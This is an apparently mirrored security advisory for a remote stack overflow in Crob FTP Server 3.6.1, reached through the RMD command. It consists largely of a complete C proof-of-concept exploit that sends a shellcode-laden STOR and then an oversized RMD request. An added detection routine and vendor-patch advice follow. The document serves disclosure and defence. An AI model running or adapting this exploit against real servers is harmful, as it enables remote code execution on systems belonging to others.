
Crob FTP Server Remote RMD Command Stack Overflow Vulnerability

  Affected systems:
  Crob Crob FTP Server 3.6.1
  Description:
  --------------------------------------------------------------------------------
  BUGTRAQ  ID: 13847
  Crob FTP Server is a simple, easy-to-use FTP server program.
  Crob FTP Server contains a buffer overflow vulnerability in its handling of client requests.
  If an attacker can supply an over-long argument to any FTP command (for example STOR) and then call the RMD command with a very long argument, a stack overflow is triggered. An attacker who successfully exploits this vulnerability can execute code on the server.
  <*Source: Leon Juranic (ljuranic@LSS.hr)
  Link: http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-06-06
  *>
  Test method:
  --------------------------------------------------------------------------------
  Warning
  The following programs (methods) may be offensive in nature and are provided for security research and teaching only. Users act at their own risk!
  /*
  * CrobFTP remote stack overflow PoC
  * ---------------------------------
  * Tested on Crob FTP Server 3.6.1, Windows XP
  *
  * Coded by Leon Juranic
  * LSS Security / http://security.lss.hr
  *
  */
  #include <winsock2.h>   /* header names restored: the mirror stripped them */
  #include <windows.h>
  #include <stdio.h>
  #pragma comment (lib,"ws2_32")

  /* Wait up to 5 seconds for a server reply; return it, or NULL on timeout/error. */
  char *fzz_recv (int sock)
  {
      fd_set fds;
      struct timeval tv;
      static char buf[10000];
      char *ptr=buf;
      int n = 0;

      tv.tv_sec = 5;
      tv.tv_usec = 0;
      FD_ZERO(&fds);
      FD_SET(sock,&fds);
      if (select(0,&fds,NULL,NULL,&tv) > 0) {   /* first argument is ignored by Winsock */
          if (FD_ISSET (sock,&fds)) n=recv (sock,ptr,sizeof(buf),0);
          if (n <= 0) return NULL;              /* connection closed or recv error */
          buf[n-1] = '\0';                      /* drop the trailing newline */
          printf ("RECV: %s\n",buf);
          return buf;
      }
      else {
          return NULL;
      }
  }

  /* Log in; returns 0 when the PASS command is answered with a 230 reply, -1 otherwise. */
  int login (int sock, char *user, char *pass)
  {
      char buf[1024], *bla;

      bla=fzz_recv(sock);                       /* server banner */
      printf ("recv: %s\n",bla);
      _snprintf (buf,sizeof(buf),"USER %s\r\n",user);
      send (sock,buf,strlen(buf),0);
      bla=fzz_recv(sock);
      printf ("recv: %s\n",bla);
      _snprintf (buf,sizeof(buf),"PASS %s\r\n",pass);
      send (sock,buf,strlen(buf),0);
      bla=fzz_recv(sock);
      printf ("recv: %s\n",bla);
      /* compare the 3-digit reply code only (the original compared the whole reply with "230") */
      if (bla != NULL && strncmp(bla,"230",3) == 0)
          return 0;
      return -1;
  }

  void lame_sploit (char *pack, char *user, char *pass)
  {
      WORD wVersionRequested;
      WSADATA wsaData;
      int sock, err,x;
      struct sockaddr_in sin;
      char buf[2000],tmp[1000];
      char *shell=                // 5 min. XP SP1 shellcode
      "\x33\xc0"                  // xor eax,eax
      "\x50"                      // push eax (\0)
      "\x68\x2e\x65\x78\x65"      // push '.exe'
      "\x68\x63\x61\x6c\x63"      // push 'calc'
      "\x54"                      // push esp
      "\xba\x44\x80\xc2\x77"      // mov  edx, 77c28044
      "\xff\xd2";                 // call edx  (system)

      wVersionRequested = MAKEWORD( 2, 2 );
      err = WSAStartup( wVersionRequested, &wsaData );
      if ( err != 0 ) {
          printf ("ERROR: Sorry, cannot create socket!!!\n");
          ExitProcess(-1);
      }
      sock=socket(AF_INET,SOCK_STREAM,0);
      sin.sin_family=AF_INET;
      sin.sin_addr.s_addr = inet_addr(pack);
      sin.sin_port = htons(21);
      if (connect(sock,(struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) {
          printf ("CONNECT :(((\n");
          ExitProcess(-1);
      }
      if (login(sock,user,pass) == -1)
      {
          printf ("ERROR: Cannot login to FTP server, sorry!!!\n");
          exit(-1);
      }

      /* first stage: STOR with a long argument (NOP sled + shellcode + return addresses) */
      memset(tmp,0,sizeof(tmp));
      memset (tmp,0x90,180);
      memcpy (&tmp[80],shell,strlen(shell));
      *(long*)&tmp[158] = 0x77da52b8; // EIP -> ret into 'jmp esp'
      *(long*)&tmp[166] = 0x74ec8390; //          sub esp,0x74
      *(long*)&tmp[170] = 0x9090e4ff; //          jmp esp
      _snprintf (buf,sizeof(buf),"STOR %s\r\n", tmp);
      printf ("DEBUG: %.30s %d\n",buf,strlen(buf));
      send (sock,buf,strlen(buf),0);
      printf ("%s\n",fzz_recv(sock));

      /* second stage: RMD with a very long argument triggers the overflow */
      strcpy(buf,"RMD ");
      for (x=0;x<276;x++)
          strcat (buf,".../");
      strcat(buf,"\r\n");
      printf ("Sending exploit strings\n");
      send (sock,buf,strlen(buf),0);
      printf ("recv: %s\n",fzz_recv(sock));
  }

  int main (int argc, char **argv)
  {
      printf ("CrobFTP Stack overflow PoC \n"
              "Coded by Leon Juranic \n"
              "LSS Security / http://security.lss.hr/\n");
      if (argc < 4 ) {
          /* argument names were stripped by the mirror; lame_sploit takes host, user, pass */
          printf ("\nusage: %s \n",argv[0]);
          exit(-1);
      }
      lame_sploit(argv[1],argv[2],argv[3]);
      return 0;
  }
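As an added defender-side example (not from the advisory or from the PoC author), the following C inspector classifies one FTP control-channel line by the traits the traffic above exhibits: an argument far beyond a normal path length, non-printable bytes, or a run of x86 NOP bytes. The 512-byte argument limit and the 16-byte NOP-run threshold are assumed policy values, and sample_rmd_line() builds a constructed request with the shape of the PoC's RMD command (276 repetitions of ".../") for testing.

```c
#include <ctype.h>
#include <string.h>
/* Assumed policy values, not from the advisory. */
#define FTP_ARG_LIMIT 512    /* longest path argument treated as normal */
#define NOP_RUN_LIMIT 16     /* 0x90 run length treated as a NOP sled */

typedef struct {
    char   verb[5];        /* FTP verbs are at most four letters (RFC 959) */
    size_t arg_len;        /* argument bytes, trailing CRLF excluded */
    size_t nonprint;       /* argument bytes outside printable ASCII */
    size_t max_nop_run;    /* longest run of 0x90 (x86 NOP) bytes */
    int    suspicious;     /* 1 if any heuristic fired */
} ftp_cmd_info;

/* Inspect one raw control-channel line of `len` bytes. Returns 0 on success,
   -1 if the line does not begin with an alphabetic verb. */
int inspect_ftp_command(const unsigned char *line, size_t len, ftp_cmd_info *out)
{
    size_t i = 0, end = len, run = 0, k;
    memset(out, 0, sizeof *out);
    while (i < len && i < sizeof out->verb - 1 && isalpha(line[i])) {
        out->verb[i] = (char)toupper(line[i]);
        i++;
    }
    if (i == 0) return -1;
    if (i < len && line[i] == ' ') i++;             /* single separator */
    while (end > i && (line[end - 1] == '\r' || line[end - 1] == '\n')) end--;
    out->arg_len = end - i;
    for (k = i; k < end; k++) {
        run = (line[k] == 0x90) ? run + 1 : 0;
        if (run > out->max_nop_run) out->max_nop_run = run;
        if (line[k] < 0x20 || line[k] > 0x7e) out->nonprint++;
    }
    out->suspicious = out->arg_len > FTP_ARG_LIMIT
                   || out->max_nop_run >= NOP_RUN_LIMIT
                   || out->nonprint > 0;
    return 0;
}

/* Constructed sample shaped like the PoC's RMD request: "RMD " + 276 x ".../" + CRLF.
   Returns the number of bytes written, or 0 if `cap` is too small. */
size_t sample_rmd_line(unsigned char *buf, size_t cap)
{
    size_t n = 4; int x;
    if (cap < 4 + 276 * 4 + 2) return 0;
    memcpy(buf, "RMD ", 4);
    for (x = 0; x < 276; x++) { memcpy(buf + n, ".../", 4); n += 4; }
    memcpy(buf + n, "\r\n", 2);
    return n + 2;
}
```

The length heuristic alone catches the RMD stage, while the non-printable and NOP-run checks catch the STOR stage that carries the payload.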
  Recommendations:
  --------------------------------------------------------------------------------
  Vendor patch:
  Crob
  ----
  The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's homepage for the latest version:
  http://www.crob.net/studio/ftpserver/
 


    Article author: Fuzhou Junwei Computer Technology Co., Ltd.
